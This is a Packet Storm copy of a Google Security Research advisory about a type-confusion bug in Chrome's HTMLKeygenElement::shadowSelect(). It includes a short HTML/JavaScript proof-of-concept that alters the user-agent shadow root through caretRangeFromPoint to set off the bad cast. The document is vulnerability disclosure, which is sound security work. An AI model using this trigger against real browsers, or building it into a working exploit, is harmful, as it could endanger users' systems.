Google Chrome HTMLKeygenElement::shadowSelect() Type Confusion

2017-02-01T00:00:00
ID PACKETSTORM:140861
Type packetstorm
Reporter Google Security Research
Modified 2017-02-01T00:00:00

Description

                                        
                                            ` Google Chrome: Type confusion in HTMLKeygenElement::shadowSelect()   
  
  
  
  
Chrome bug:  
<a href="https://bugs.chromium.org/p/chromium/issues/detail?id=666246" title="" class="" rel="nofollow">https://bugs.chromium.org/p/chromium/issues/detail?id=666246</a>  
  
PoC:  
  
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">  
<script>  
var range = document.caretRangeFromPoint(50, 50);  
var shadow_tree_container = range.commonAncestorContainer;  
shadow_tree_container.prepend("foo");  
keygen_element.disabled = true;  
</script>  
  
What happens here:  
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript  
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: ifratric  
  
`